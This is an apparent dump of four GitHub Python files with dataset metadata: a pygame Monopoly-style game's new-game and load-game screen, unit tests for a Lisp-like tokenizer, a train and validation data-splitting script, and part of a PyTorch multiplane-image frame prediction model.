datetime import datetime #Getting the current date and time as understood by humans (rather than UNIX time)\n\nfrom textbox import TextBox\nfrom msgbox import MessageBox\nfrom cls_offline import *\nfrom button import Button\nfrom lib import getFileLines, CreateTitleDeed, CreateMortDeed, getCardEffects\n\n#------------------------------New Game Functions------------------------------\ndef countNames(boxes): #Counts how many of the available 6 boxes have had something entered into them\n counter = 0\n for t_box in boxes:\n if len(t_box.getContents()) > 0:\n counter += 1\n return counter\n\ndef lengthsValid(boxes): #Checks that none of the names entered have more than 12 characters\n for t_box in boxes:\n if len(t_box.getContents()) > 12: #Maximum allowed length of a username is 12 characters\n return False\n return True\n\ndef namesDuplicate(boxes):\n #Cycles through all pairings of username boxes to check for duplication\n for outer in range(5,-1,-1): #Iterates from 5 to 0\n for inner in range(outer): #Iterates up to outer-1\n #Checks a box is being compared with itself and that both actually have a name in them\n if inner != outer and len(boxes[outer].getContents()) > 0 and len(boxes[inner].getContents()) > 0:\n #Username comparison not case-sensitive as allowing both LEE and Lee could lead to confusion\n if boxes[outer].getContents().lower() == boxes[inner].getContents().lower():\n return True\n return False\n\ndef containsComma(boxes):\n for t_box in boxes:\n if \",\" in 
t_box.getContents():\n return True\n return False\n\ndef namesValid(boxes):\n #Must be at least 2 names entered (as game cannot be played with fewer than 2 players\n #No duplicate names and usernames 12 characters or less as they will not be able to be displayed in an aesthetically pleasing way on screen later otherwise\n if namesDuplicate(boxes) or lengthsValid(boxes) == False or countNames(boxes) < 2 or containsComma(boxes):\n return False\n else:\n return True\n\ndef createPlayers(p_icons, boxes, board_dim, data_file_path): #Create Player objects using the names entered into text boxes and the corresponding icons\n fh = open(data_file_path, \"r\")\n init_mon = int(fh.readline())\n fh.close()\n \n player_temp = Player(0, None, 0, \"\")\n new_players = np.array([None] * countNames(boxes))\n p_counter = 0 #Stores which element in the new_players array is next to be instantiated\n for b_counter in range(6):\n if len(boxes[b_counter].getContents()) > 0: #Name must have been entered for a player to come into existence\n p_piece = Player_Piece(player_temp.calcPieceX(0, board_dim/768), player_temp.calcPieceY(0, board_dim/768), pygame.transform.smoothscale(p_icons[b_counter], [32, 32]), b_counter) #Create piece separately\n new_players[p_counter] = Player(init_mon, p_piece, 0, boxes[b_counter].getContents()) #Now create player. 1500 is the money and 0 is the initial board position\n p_counter += 1\n return new_players\n\n#Create the decks of Pot Luck and Council Chest cards, based off of data and images loading in from external files\ndef createDeck(deck_name, card_base_path, card_texts_path, card_data_path, deck_size):\n deck_cards = np.array([None] * deck_size) #Array of blank objects; will become array of individual Card objects\n card_effects = getCardEffects(card_texts_path)\n card_img = None #Blank object, later to become loaded-in pygame images\n text_line = \"\"\n\n fh = open(card_data_path, \"r\")\n for counter in range(deck_size): #Iterate up to deck_size-1\n card_img = pygame.transform.smoothscale(pygame.image.load(card_base_path + str(counter + 1) + \".png\"), [330, 200]) #Images are named \"Pot Luck 1.png\", for example. N.B. Numbering starts at one, hence the +1\n text_line = fh.readline()\n data_array = np.array(text_line.split(\",\")) #Values are comma-separated in the external file\n for d_count in range(len(data_array)): #Convert each of the elements in the array from String (as they will be coming from an external file) to numbers\n data_array[d_count] = int(data_array[d_count])\n \n deck_cards[counter] = Card(deck_name, card_img, card_effects, data_array)\n fh.close()\n\n ret_deck = Card_Deck(deck_cards)\n ret_deck.shuffleCards() #Randomly arrange the array of cards such that they will not be the same during every game\n return ret_deck\n\n#Creates an array of properties using data from a data file at the start of the game\ndef LoadProperties(file_path):\n property_arr = np.array([None]*40) #Partition numpy array with 40 elements\n fh = open(file_path, \"r\") #Opens the sequential file for reading\n for counter in range(40): #40 properties\n propType = int(fh.read(2)[:1]) #Reads in the first two characters in a line (one number and a separating comma) and then takes the first character. 
This leaves propType being an integer determining which type of property the line is for\n line_text = fh.readline() #Read in the rest of the line, where all data is for a single property\n prop_values = np.array(line_text.split(\",\")) #Transforms the string into an array where each comma-separated item is an indivual element\n\n if propType == 0: #Most common property type\n property_arr[counter] = Normal_Property(prop_values, CreateTitleDeed(prop_values), CreateMortDeed(prop_values[0], int(prop_values[10])*1.2))\n elif propType == 1: #School (requires crest image for title deed)\n property_arr[counter] = School_Property(prop_values, pygame.image.load(\"img/Deeds/\" + str(prop_values[0]) + \".png\"), CreateMortDeed(prop_values[0], int(prop_values[6])*1.2))\n elif propType == 2: #Stations (requires crest image for title deed)\n property_arr[counter] = Station_Property(prop_values, pygame.image.load(\"img/Deeds/\" + str(prop_values[0]) + \".png\"), CreateMortDeed(prop_values[0], int(prop_values[4])*1.2))\n elif propType == 3: #Pot Luck card spot\n property_arr[counter] = Property(prop_values[0].strip(), Prop_Type.POT_LUCK)\n elif propType == 4: #Council Chest card spot\n property_arr[counter] = Property(prop_values[0].strip(), Prop_Type.COUNCIL_CHEST)\n elif propType == 5: #Lost In Bogside spot\n property_arr[counter] = Property(prop_values[0].strip(), Prop_Type.LOST_IN_BOGSIDE)\n elif propType == 6: #Go To Bogside space\n property_arr[counter] = Go_To_Bogside(prop_values[0].strip(), prop_values[1])\n elif propType == 7: #Property that incurs a charge when landed upon\n property_arr[counter] = Charge_Property(prop_values[0].strip(), prop_values[1])\n elif propType == 8: #Job Centre where the player collects money when passing it\n property_arr[counter] = Property(prop_values[0].strip(), Prop_Type.JOB_CENTRE)\n elif propType == 9: #Disabled Parking - Does nothing as of yet (and it probably never will)\n property_arr[counter] = Property(prop_values[0].strip(), Prop_Type.DISABLED_PARKING)\n fh.close()\n return property_arr #Array of 40 Property (or subclass) objects\n\n#Create the Board object that will become part of the Game class later\ndef createBoard(data_file_path, props_arr, Pot_Luck, Council_Chest, image_path, image_dim):\n fh = open(data_file_path, \"r\")\n bog_pos = int(fh.readline()) #Board position of what would be the jail\n centre_mon = int(fh.readline()) #Money obtained upon passing the Job Centre\n fh.close()\n\n board_img = pygame.image.load(image_path) #Load and resize board image\n board_img = pygame.transform.smoothscale(board_img, [image_dim, image_dim])\n scale_f = image_dim/768 #Used in piece positioning - formulae were created for a 768x768 board\n\n ret_board = Board(props_arr, bog_pos, centre_mon, Pot_Luck, Council_Chest, board_img, scale_f)\n return ret_board\n\n#Create the final Game object - this is the main point of the New Game screen\ndef createGame(game_players, game_board, game_save, dice_imgs_base_paths):\n dice_imgs = np.array([None] * 6)\n for d_count in range(6):\n dice_imgs[d_count] = pygame.image.load(dice_imgs_base_paths + str(d_count+1) + \".png\") #+1 as dice images are stored with numbers 1 to 6 in the file\n dice_arr = np.array([None] * 2)\n dice_arr[0] = Die(dice_imgs)\n dice_arr[1] = Die(dice_imgs)\n\n ret_game = Game(game_players, dice_arr, game_board, game_save)\n return ret_game\n\n#Create an array of game players based on data loaded in from a file\ndef LoadPlayers(load_arr):\n new_players = np.array([None] * int(load_arr[0][1])) 
#load_arr[0][1] stores the number of players\n player_temp = Player(0, None, 0, \"\")\n for counter in range(len(new_players)):\n p_piece = Player_Piece(player_temp.calcPieceX(int(load_arr[counter+1][2]), 600/768), player_temp.calcPieceY(int(load_arr[counter+1][2]), 600/768), pygame.transform.smoothscale(pygame.image.load('img/Pieces/' + str(int(load_arr[counter+1][3])+1) + '.png'), [32, 32]), int(load_arr[counter+1][3])) #Create piece separately. load-arr[counter+1][3] stores a number from 0-5 relating to which of the token images is used (1.png - 6.png)\n new_players[counter] = Player(int(load_arr[counter+1][1]), p_piece, int(load_arr[counter+1][2]), load_arr[counter+1][0], bool(int(load_arr[counter+1][8])), bool(int(load_arr[counter+1][7]))) #Second element (not [counter+1]) is related to the order in which the data was saved, which can be seen in Game.saveGame method\n new_players[counter].hasBogMap = bool(int(load_arr[counter+1][4])) #Relevant element of this array\n new_players[counter].nextRollMod = int(load_arr[counter+1][5]) #Final player attributes being restored\n new_players[counter].turnsToMiss = int(load_arr[counter+1][6])\n return new_players\n\n\n#------------------------------New Game Method------------------------------ \ndef NewGame(screen, clock):\n mainGame = None #Create new object that will eventually become a Game object\n pieces = np.array([None] * 6) #Array to store the 6 images for the player icons that will be linked to the textboxes\n for p_counter in range(6):\n pieces[p_counter] = pygame.transform.smoothscale(pygame.image.load(\"img/Pieces/\" + str(p_counter+1) + \".png\"), [50, 50]) #Load image into pygame and resize\n\n box_arr = np.array([None] * 6) #Array of 6 textboxes - one to one correspondence with the elements of the pieces array\n for b_counter in range(6):\n #Indices related to location on screen:\n #0 1\n #2 3\n #4 5\n #Additional kwargs allow for control over additional behaviour/functionality, much of which is never utilised in this game\n box_arr[b_counter] = TextBox((100 + 500*(b_counter%2), 175 + 55*int(b_counter/2), 380, 50), clear_on_enter=False, inactive_on_enter=False, active=False, active_color=pygame.Color(\"red\"))\n save_path_box = TextBox((340, 550, 640, 50), clear_on_enter=False, inactive_on_enter=False, active=False, active_color=pygame.Color(\"red\"))\n\n now = datetime.now()\n #Save file name is in the form YYYYMMDD_HHMMSS.dfo\n month = '0' + str(now.month)\n day = '0' + str(now.day)\n hour = '0' + str(now.hour)\n minute = '0' + str(now.minute)\n second = '0' + str(now.second)\n \n save_initial = os.path.dirname(os.path.abspath(__file__)) + '/saves/' + str(now.year) + month[-2:] + day[-2:] + '_' + hour[-2:] + minute[-2:] + second[-2:] + '.dfo'\n \n #save_initial = 'C:/Users/' + getpass.getuser() + '/Dunfermline-opoly/' + str(now.year) + month[-2:] + day[-2:] + '_' + hour[-2:] + minute[-2:] + second[-2:] + '.dfo'\n save_path_box.buffer = list(save_initial)\n\n font_48 = pygame.font.SysFont('Arial', 48) #Fonts used for texts\n font_60 = pygame.font.SysFont('Arial', 60)\n\n new_game_title = font_60.render(\"New Game:\", True, (0,0,0))\n icon_title = font_48.render(\"Enter Player Names (max 12 characters)\", True, (0,0,0))\n save_title = font_48.render(\"Save File Path:\", True, (0,0,0))\n\n new_buts = [Button(150, 650, 300, 80, 'Create Game', font_60), #Create Game\n Button(600, 650, 300, 80, 'Load Game', font_60), #Load Game\n Button(870, 20, 120, 70, 'Exit', font_48), #Exit\n Button(935, 100, 55, 55, '?', font_48)] #Info\n\n 
msgBox = None\n    \n    screen_running = True\n    while screen_running:\n        for event in pygame.event.get():\n            if msgBox != None:\n                msgBox.handle_input_event(event)\n                if msgBox.should_exit == False:\n                    break\n            if event.type == pygame.QUIT:\n                screen_running = False\n                gotoScreen = -1\n            if event.type == pygame.KEYDOWN:\n                if event.key == pygame.K_ESCAPE: #Escape key exits the game\n                    screen_running = False\n                    gotoScreen = -1 #Game will completely exit\n\n            for but in new_buts:\n                but.handle_input_event(event)\n            for box in box_arr: \n                box.get_event(event) #Function that allows each textbox to register key presses and the like\n            save_path_box.get_event(event)\n        \n\n        screen.fill((255,255,255)) #Clear the screen\n\n        for but in new_buts: #Display buttons\n            but.render(screen)\n\n        #Display pure text aspects of the screen\n        screen.blit(new_game_title, [10, 10])\n        screen.blit(icon_title, [30, 75])\n        screen.blit(save_title, [50, 545])\n        \n        for box in box_arr:\n            box.update() #To do with internal workings - take clicks, key pressed etc. into account\n            box.draw(screen) #Display the boxes on screen - one of the TextBox classes methods \n        save_path_box.update() #Do the same as above but for the object that is not part of the array\n        save_path_box.draw(screen)\n\n        for piece_count in range(6): #Display the 6 pieces on screen to the left of the relevant text box\n            screen.blit(pieces[piece_count], [45 + 500*(piece_count%2), 175 + 55*int(piece_count/2)])\n\n        if new_buts[3].clicked():\n            msgBox = MessageBox(screen, 'Bottle: A common and very possibly-alcoholic beverage often enjoyed by Dunfermline residents (only those over 18 of course). \\n Can: A popular soft drink that definitely does not infringe upon any Intellectual Property Rights. \\n Coal: Coal mining was a prosperous (albeit dangerous) industry for hundreds of years in the Dunfermline and Fife area. \\n Crown: Dunfermline is a royal burgh. \\n Badly-drawn Sheep: Sheep farming is very common in the Dunfermline area. \\n Battleship: Dunfermline is situated near to the Royal Navy dockyard in Rosyth.', 'Token Info')\n\n        if new_buts[2].clicked():\n            screen_running = False\n            gotoScreen = -1\n\n        if new_buts[0].clicked(): #If button to create the game itself was clicked\n            valid = True #Whether the file part of the process is alright\n            if save_path_box.getContents()[-3:].lower() != \"dfo\": #Must have correct file ending, or invalid\n                msgBox = MessageBox(screen, 'Invalid file. Please ensure the entered file has the correct .dfo file ending.', 'File Error')\n                valid = False\n\n            if valid: \n                try:\n                    os.makedirs(os.path.dirname(save_path_box.getContents()), exist_ok=True)\n                    f = open(save_path_box.getContents(), 'w+')\n                except: #Any error occurs in creating the directory or file\n                    msgBox = MessageBox(screen, 'Invalid save file entered. 
Please ensure the path entered exists and you have permissions to access it (the file does not have to)', 'Invalid Save File')\n valid = False\n\n if valid:\n if namesValid(box_arr): #Validate the player's username\n players = createPlayers(pieces, box_arr, 600, \"data/Player_Data.txt\") #Create array of Player objects\n prop_arr = LoadProperties(\"data/Property Values.txt\") #Create array of Property objects\n Pot_Luck_Deck = createDeck(\"Pot Luck\", \"img/PL/Pot Luck \", \"data/Card_Texts.txt\", \"data/PL Master.txt\", 16) #Create Card_Deck object\n Council_Chest_Deck = createDeck(\"Council Chest\", \"img/CC/Council Chest \", \"data/Card_Texts.txt\", \"data/CC Master.txt\", 16) #Create Card_Deck object\n game_board = createBoard(\"data/Board_Data.txt\", prop_arr, Pot_Luck_Deck, Council_Chest_Deck, \"img/Board.png\", 600) #Create Board object\n\n mainGame = createGame(players, game_board, save_path_box.getContents(), \"img/Dice/\") #Finally create the single, cohesive Game object that is the sole purpose of this screen/part of the game\n \n screen_running = False\n gotoScreen = 1 #1=Main game screen\n else:\n msgBox = MessageBox(screen, 'The names you entered are invalid. Please ensure all names are 12 characters or less, different (this part is not case-sensitive) and you have entered at least two user names', 'Invalid Usernames') \n\n if new_buts[1].clicked():\n valid = True\n if save_path_box.getContents()[-3:].lower() != \"dfo\": #Must have correct file ending, or invalid\n msgBox = MessageBox(screen, 'Invalid file. Please select a different file or create a new game', 'File Error')\n valid = False\n \n try:\n f = open(save_path_box.getContents(), 'r')\n except: #If an error occurs, then also invalid\n msgBox = MessageBox(screen, 'Cannot open file. 
Please select a different file or create a new game', 'File Error')\n valid = False\n\n if valid:\n data_arr = []\n for line in f:\n data_arr.append(line.strip().split(','))\n data_arr = np.array(data_arr, dtype=object)\n \n players = LoadPlayers(data_arr) \n prop_arr = LoadProperties(\"data/Property Values.txt\") #Create array of Property objects\n Pot_Luck_Deck = createDeck(\"Pot Luck\", \"img/PL/Pot Luck \", \"data/Card_Texts.txt\", \"data/PL Master.txt\", 16) #Create Card_Deck object\n Council_Chest_Deck = createDeck(\"Council Chest\", \"img/CC/Council Chest \", \"data/Card_Texts.txt\", \"data/CC Master.txt\", 16) #Create Card_Deck object\n game_board = createBoard(\"data/Board_Data.txt\", prop_arr, Pot_Luck_Deck, Council_Chest_Deck, \"img/Board.png\", 600) #Create Board object\n\n for counter in range(int(data_arr[0][1])+1, len(data_arr)):\n if game_board.getProp(int(data_arr[counter][0])).prop_type == Prop_Type.NORMAL:\n game_board.getProp(int(data_arr[counter][0])).buyProperty(int(data_arr[counter][1]))\n game_board.getProp(int(data_arr[counter][0])).C_Houses = int(data_arr[counter][2])\n game_board.getProp(int(data_arr[counter][0])).T_Blocks = int(data_arr[counter][3])\n game_board.getProp(int(data_arr[counter][0])).mortgage_status = bool(int(data_arr[counter][4]))\n elif game_board.getProp(int(data_arr[counter][0])).prop_type == Prop_Type.STATION or game_board.getProp(int(data_arr[counter][0])).prop_type == Prop_Type.SCHOOL:\n game_board.getProp(int(data_arr[counter][0])).buyProperty(int(data_arr[counter][1]))\n game_board.getProp(int(data_arr[counter][0])).mortgage_status = bool(int(data_arr[counter][2]))\n \n mainGame = createGame(players, game_board, save_path_box.getContents(), \"img/Dice/\") #Finally create the single, cohesive Game object that is the sole purpose of this screen/part of the game\n mainGame.cur_player = int(data_arr[0][0]) #Positions in array as per the order of saving, which can be seen in the method within the Game class\n mainGame.autosave = bool(int(data_arr[0][2]))\n \n screen_running = False\n gotoScreen = 1 #1=Main game screen \n \n if msgBox != None:\n msgBox.update()\n if msgBox.should_exit == False:\n msgBox.draw(screen)\n\n clock.tick(30) #30 fps\n pygame.display.flip() #Refresh screen\n\n return mainGame, gotoScreen #Pass the Game object and the integer storing where the game will go to next back out to the main game loop\n","repo_name":"lee-suddaby/Dunfermline-opoly-networked","sub_path":"new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":21050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4534716509","text":"import io\nimport unittest\n\nfrom noname import tokenize\n\n\nclass TestLexer(unittest.TestCase):\n def to_char_stream(self, string):\n for c in string:\n yield c\n\n def test_easy(self):\n source = self.to_char_stream('(+ 1 2')\n result = list(tokenize(source))\n tokens = ['(', '+', '1', '2']\n self.assertEqual(tokens, result)\n\n def test_simple(self):\n source = self.to_char_stream('(is-geonu? 
\"Geonu Choi\" 24 173.2 true)')\n result = list(tokenize(source))\n tokens = ['(', 'is-geonu?', '\"Geonu Choi\"', '24', '173.2', 'true', ')']\n self.assertEqual(tokens, result)\n\n def test_whitespace(self):\n source = self.to_char_stream(' ( is-geonu?\"Geonu Choi\" 24 173.2 \\'true)')\n result = list(tokenize(source))\n tokens = ['(', 'is-geonu?', '\"Geonu Choi\"', '24', '173.2', \"'\",\n 'true', ')']\n self.assertEqual(tokens, result)\n\n def test_nested(self):\n source = self.to_char_stream('(defn positive? (x) (if (> x 0) true false))')\n result = list(tokenize(source))\n tokens = ['(', 'defn', 'positive?',\n '(', 'x', ')',\n '(', 'if', '(', '>', 'x', '0', ')', 'true', 'false', ')',\n ')']\n self.assertEqual(tokens, result)\n\n def test_complex_string(self):\n expected = r'\"Complex \\n-string\\\"\"'\n source = self.to_char_stream(expected)\n result = list(tokenize(source))\n self.assertEqual([expected], result)\n\n def test_escape_string(self):\n expected = r'\"escape\\\\\"'\n source = self.to_char_stream(expected)\n result = list(tokenize(source))\n self.assertEqual([expected], result)\n\n def test_stream(self):\n def to_char_stream(stream):\n for line in stream:\n for c in line:\n yield c\n\n stream = io.StringIO()\n token_stream = tokenize(to_char_stream(stream))\n\n stream.write('(12 \"foo\" + 12 11 \"foo\" 11 ')\n stream.seek(0)\n\n self.assertEqual('(', next(token_stream))\n self.assertEqual('12', next(token_stream))\n self.assertEqual('\"foo\"', next(token_stream))\n self.assertEqual('+', next(token_stream))\n self.assertEqual('12', next(token_stream))\n self.assertEqual('11', next(token_stream))\n self.assertEqual('\"foo\"', next(token_stream))\n self.assertEqual('11', next(token_stream))\n try:\n next(token_stream)\n except StopIteration:\n pass\n else:\n assert False, \"StopIteration not occurred\"\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"imtherealk/noname","sub_path":"tests/test_lexer.py","file_name":"test_lexer.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21932625157","text":"import random\nfrom argparse import ArgumentParser\n\n\ndef split_data_file(\n input_file,\n train_file: str = \"train.txt\",\n val_file: str = \"val.txt\",\n val_split: float = 0.3,\n seed: int | None = None,\n):\n # Set the random seed for reproducibility\n random.seed(seed)\n\n # Read the input file\n with open(input_file, \"r\") as f:\n lines = f.readlines()\n\n # Shuffle the lines randomly\n random.shuffle(lines)\n\n # Calculate the number of lines for validation set\n num_val = int(len(lines) * val_split)\n\n # Split the lines into train and validation sets\n train_lines = lines[num_val:]\n val_lines = lines[:num_val]\n\n # Write the train lines to train file\n with open(train_file, \"w\") as f:\n f.writelines(train_lines)\n\n # Write the validation lines to validation file\n with open(val_file, \"w\") as f:\n f.writelines(val_lines)\n\n\nif __name__ == \"__main__\":\n # Create an argument parser\n parser = ArgumentParser(\n description=\"Split a data file into train and validation files\"\n )\n\n # Add the arguments\n parser.add_argument(\n \"--input-file\", \"-i\", type=str, help=\"Path to the input data file\"\n )\n parser.add_argument(\n \"--train-file\",\n type=str,\n default=\"train.txt\",\n help=\"Output path to the train file\",\n )\n parser.add_argument(\n \"--val-file\",\n type=str,\n default=\"val.txt\",\n help=\"Output path to the validation 
file\",\n )\n parser.add_argument(\n \"--val-split\", type=float, default=0.3, help=\"Validation split ratio\"\n )\n parser.add_argument(\n \"--seed\", type=int, default=123, help=\"Random seed for reproducibility\"\n )\n\n # Parse the arguments\n args = parser.parse_args()\n\n # Call the split_data_file function\n split_data_file(\n args.input_file, args.train_file, args.val_file, args.val_split, args.seed\n )\n","repo_name":"bwconrad/video-classification","sub_path":"scripts/split_data.py","file_name":"split_data.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1461450773","text":"# Shree KRISHNAya Namaha\n#\n# Author: Nagabhushan S N\n# Last Modified: 26/08/2022\n\nimport time\nimport datetime\nimport traceback\nfrom collections import OrderedDict\n\nimport numpy\nimport skimage.io\nimport skvideo.io\nimport pandas\nimport simplejson\n\nfrom pathlib import Path\nfrom tqdm import tqdm\nfrom matplotlib import pyplot\nimport torch\nimport torch.nn.functional as F\n\nfrom utils import MpiUtils, CommonUtils\nfrom utils.WarperPytorch import Warper\n\nthis_filepath = Path(__file__)\nthis_filename = this_filepath.stem\n\n\nclass FramePredictor(torch.nn.Module):\n def __init__(self, configs: dict, feature_extractor, local_flow_estimator, local_flow_predictor, \n infilling_flow_predictor):\n super().__init__()\n self.configs = configs\n self.feature_extractor = feature_extractor\n self.local_flow_estimator = local_flow_estimator\n self.local_flow_predictor = local_flow_predictor\n self.infilling_flow_predictor = infilling_flow_predictor\n self.warper = Warper(configs['device'])\n self.num_mpi_planes = self.configs['frame_predictor']['num_mpi_planes']\n self.num_pred_frames = self.configs['frame_predictor']['num_pred_frames']\n self.num_infilling_iterations = self.configs['frame_predictor']['num_infilling_iterations']\n self.device = CommonUtils.get_device(configs['device'])\n return\n\n def forward(self, input_batch: dict, return_intermediate_results: bool = False):\n b, c, h, w = input_batch['frame1'].shape\n min_depth = input_batch['depth1'].reshape((b, h*w)).min(dim=1)[0]\n max_depth = torch.clip(input_batch['depth1'].reshape((b, h*w)).max(dim=1)[0], min=0, max=1000)\n depth1_planes = MpiUtils.get_depth_planes_tr(self.num_mpi_planes, min_depth, max_depth)\n warper_inputs = {\n 'frame1': input_batch['frame0'],\n 'depth1': input_batch['depth0'],\n 'transformation1': input_batch['transformation0'],\n 'transformation2': input_batch['transformation1'],\n 'intrinsic1': input_batch['intrinsic0'],\n 'intrinsic2': input_batch['intrinsic1'],\n 'depth2_planes': depth1_planes,\n }\n warper_outputs = self.warper.forward_warp_frame2mpi(warper_inputs)\n warped_mpi0_rgb = warper_outputs['warped_mpi2_rgb']\n warped_mpi0_alpha = warper_outputs['warped_mpi2_alpha']\n\n mpi1_alpha, mpi1_depth_planes, mpi1_rgb = MpiUtils.create_mpi_tr(input_batch['depth1'], depth1_planes,\n [input_batch['frame1']])\n\n # Estimate past local flow\n flow_inputs = {\n 'mpi0_rgb': warped_mpi0_rgb,\n 'mpi0_alpha': warped_mpi0_alpha,\n 'mpi1_rgb': mpi1_rgb,\n 'mpi1_alpha': mpi1_alpha,\n 'depth1_planes': mpi1_depth_planes,\n }\n with torch.cuda.amp.autocast():\n flow_outputs = self.estimate_past_local_flow(flow_inputs)\n local_mpi_flow10 = flow_outputs['local_mpi_flow10']\n # local_mpi_flow10_mask = flow_outputs['local_mpi_flow10_mask']\n local_flow10, local_flow10_mask = MpiUtils.alpha_compositing(local_mpi_flow10, mpi1_alpha)\n\n 
output_batch = {\n 'predicted_frames': [],\n 'predicted_frames_mask': [],\n }\n\n # Delete redundant tensors to free memory\n del warped_mpi0_rgb, warped_mpi0_alpha, mpi1_depth_planes, local_flow10_mask\n\n for i in range(self.num_pred_frames):\n # Predict future flow\n flow_predictor_input = {\n 'local_flow10': local_flow10,\n # 'local_mpi_flow10_mask': local_mpi_flow10_mask,\n 'num_past_steps': self.num_pred_frames + 1,\n 'num_future_steps': i + 1,\n }\n flow_predictor_output = self.local_flow_predictor(flow_predictor_input)\n local_flow12 = flow_predictor_output['local_flow12_predicted']\n # local_flow12_mask = flow_predictor_output['local_flow12_predicted_mask']\n\n # Warp mpi1 to mpi2 using local_mpi_flow12\n warper_inputs = {\n 'frame1': input_batch['frame1'],\n 'depth1': input_batch['depth1'],\n 'local_flow12': local_flow12,\n # 'local_flow12_mask': local_flow12_mask,\n 'transformation1': input_batch['transformation1'],\n 'transformation2': input_batch['transformation2'][i],\n 'intrinsic1': input_batch['intrinsic1'],\n 'intrinsic2': input_batch['intrinsic2'][i],\n 'num_mpi_planes': self.num_mpi_planes,\n }\n warper_outputs = self.warper.forward_warp_frame2mpi(warper_inputs)\n warped_mpi2_rgb, warped_mpi2_alpha = warper_outputs['warped_mpi2_rgb'], warper_outputs['warped_mpi2_alpha']\n\n infilling_inputs = {\n 'mpi_rgb': warped_mpi2_rgb,\n 'mpi_alpha': warped_mpi2_alpha,\n }\n with torch.cuda.amp.autocast():\n infilling_outputs = self.infill_mpi(infilling_inputs)\n infilled_mpi2_rgb = infilling_outputs['infilled_mpi_rgb']\n infilled_mpi2_alpha = infilling_outputs['infilled_mpi_alpha']\n\n predicted_frame2, mask2 = MpiUtils.alpha_compositing(infilled_mpi2_rgb, infilled_mpi2_alpha)\n output_batch['predicted_frames'].append(predicted_frame2)\n output_batch['predicted_frames_mask'].append(mask2)\n\n if return_intermediate_results:\n assert self.num_pred_frames == 1\n intermediate_inputs = {\n # 'mpi_rgb': mpi1_rgb,\n # 'mpi1_alpha': mpi1_alpha,\n 'frame1': input_batch['frame1'],\n 'depth1': input_batch['depth1'],\n 'local_flow12': local_flow12,\n 'total_flow_warped_mpi2_rgb': warped_mpi2_rgb,\n 'total_flow_warped_mpi2_alpha': warped_mpi2_alpha,\n }\n intermediate_outputs = self.compute_intermediate_results(intermediate_inputs)\n output_batch.update(intermediate_outputs)\n return output_batch\n\n def estimate_past_local_flow(self, input_batch):\n # Extract features\n feature_extractor_input = {\n 'mpi_rgb': input_batch['mpi1_rgb'],\n 'mpi_alpha': input_batch['mpi1_alpha'],\n }\n feature_extractor_output = self.feature_extractor(feature_extractor_input)\n mpi1_features = feature_extractor_output['mpi_features']\n feature_extractor_input = {\n 'mpi_rgb': input_batch['mpi0_rgb'],\n 'mpi_alpha': input_batch['mpi0_alpha'],\n }\n feature_extractor_output = self.feature_extractor(feature_extractor_input)\n mpi0_features = feature_extractor_output['mpi_features']\n\n # Estimate flow\n flow_estimator_input = {\n 'mpi1_features': mpi1_features,\n 'mpi2_features': mpi0_features,\n 'mpi1_alpha': input_batch['mpi1_alpha'],\n 'mpi2_alpha': input_batch['mpi0_alpha'],\n }\n flow_estimator_output = self.local_flow_estimator(flow_estimator_input)\n local_mpi_flow10 = flow_estimator_output['estimated_mpi_flows12'][0][0]\n # local_mpi_flow10_mask = flow_estimator_output['estimated_mpi_flows12'][0][1]\n\n # Take expectation of z-flow distribution\n local_mpi_flow10xy = local_mpi_flow10[:, :2]\n local_mpi_flow10z = torch.sum(local_mpi_flow10[:, 2:6] * input_batch['depth1_planes'], dim=1, keepdim=True) - 
input_batch['depth1_planes']\n local_mpi_flow10 = torch.cat([local_mpi_flow10xy, local_mpi_flow10z], dim=1) * input_batch['mpi1_alpha']\n\n output_batch = {\n 'local_mpi_flow10': local_mpi_flow10,\n # 'local_mpi_flow10_mask': local_mpi_flow10_mask,\n }\n return output_batch\n\n def infill_mpi(self, input_batch):\n mpi_rgb = input_batch['mpi_rgb']\n mpi_alpha = input_batch['mpi_alpha']\n\n for i in range(self.num_infilling_iterations):\n mask = MpiUtils.alpha2mask(mpi_alpha)\n infill_input_batch = {\n 'mpi_rgb': mpi_rgb,\n 'mpi_alpha': mpi_alpha,\n 'mask': mask,\n }\n infill_output_batch = self.infill_one_iter(infill_input_batch)\n mpi_rgb = infill_output_batch['infilled_mpi_rgb']\n mpi_alpha = infill_output_batch['infilled_mpi_alpha']\n # disoccluded_flow = infill_output_batch['disoccluded_flow']\n\n pred_frame, pred_mask = MpiUtils.alpha_compositing(mpi_rgb, mpi_alpha)\n output_batch = {\n # 'disoccluded_flow': disoccluded_flow,\n 'infilled_mpi_rgb': mpi_rgb,\n 'infilled_mpi_alpha': mpi_alpha,\n 'pred_frame': pred_frame,\n 'pred_mask': pred_mask,\n }\n return output_batch\n\n def infill_one_iter(self, input_batch: dict):\n flow_predictor_output = self.infilling_flow_predictor(input_batch)\n\n warper_inputs = {\n 'mpi_rgb': input_batch['mpi_rgb'],\n 'mpi_alpha': input_batch['mpi_alpha'],\n 'disoccluded_flow': flow_predictor_output['disoccluded_flow'],\n }\n warper_outputs = self.warper.bilinear_interpolation_mpi_flow2d(warper_inputs)\n mask = input_batch['mask'][:, :, :, :, None]\n infilled_mpi_rgb = mask * input_batch['mpi_rgb'] + (1 - mask) * warper_outputs['warped_rgb']\n infilled_mpi_alpha = mask * input_batch['mpi_alpha'] + (1 - mask) * warper_outputs['warped_alpha']\n\n del flow_predictor_output['disoccluded_flow'], warper_outputs['warped_rgb'], warper_outputs['warped_alpha']\n\n output_batch = {\n # 'disoccluded_flow': flow_predictor_output['disoccluded_flow'],\n 'infilled_mpi_rgb': infilled_mpi_rgb,\n 'infilled_mpi_alpha': infilled_mpi_alpha,\n }\n return output_batch\n \n def compute_intermediate_results(self, input_batch):\n output_batch = {\n 'local_flow12': input_batch['local_flow12'],\n 'total_flow_warped_mpi2_rgb': input_batch['total_flow_warped_mpi2_rgb'],\n 'total_flow_warped_mpi2_alpha': input_batch['total_flow_warped_mpi2_alpha'],\n }\n local_flow_warped_frame2 = self.warper.bilinear_splatting(input_batch['frame1'], None, input_batch['depth1'], \n input_batch['local_flow12'][:, :2], None)[0]\n total_flow_warped_frame2 = MpiUtils.alpha_compositing(input_batch['total_flow_warped_mpi2_rgb'], \n 